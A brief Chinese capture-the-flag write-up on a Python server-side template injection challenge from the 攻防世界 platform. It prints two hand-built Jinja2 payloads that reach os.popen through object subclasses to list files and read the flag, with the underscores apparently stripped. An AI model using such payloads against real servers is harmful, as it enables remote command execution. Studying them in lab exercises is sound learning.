攻防世界-Web进阶-Web_python_template_injection

模板注入，记得之前明明写过一篇的，找不到了，就只好再写一篇了
之前写模板注入都是用的tplmap，gayhub上就有，用法很简单，百度一大堆
但是tplmap只能解决带参的，不带参的就只能手工注了，这题就只能手工注
先测试一下

应该是存在服务端模板注入攻击（SSTI）了，详情可以参考https://blog.knownsec.com/2015/11/server-side-template-injection-attack-analysis/

模板可以参考https://www.cnblogs.com/cioi/p/12308518.html#a7

构造
{{''.class.mro[2].subclasses()[71].init.globals['os'].popen('ls').read()}}

{{''.class.mro[2].subclasses()[71].init.globals['os'].popen('cat%20fl4g').read()}}

tplmap用法
可以看下我写的这道题解，buuctf的fakegoogle
https://www.cnblogs.com/Web-Fresher/p/13723197.html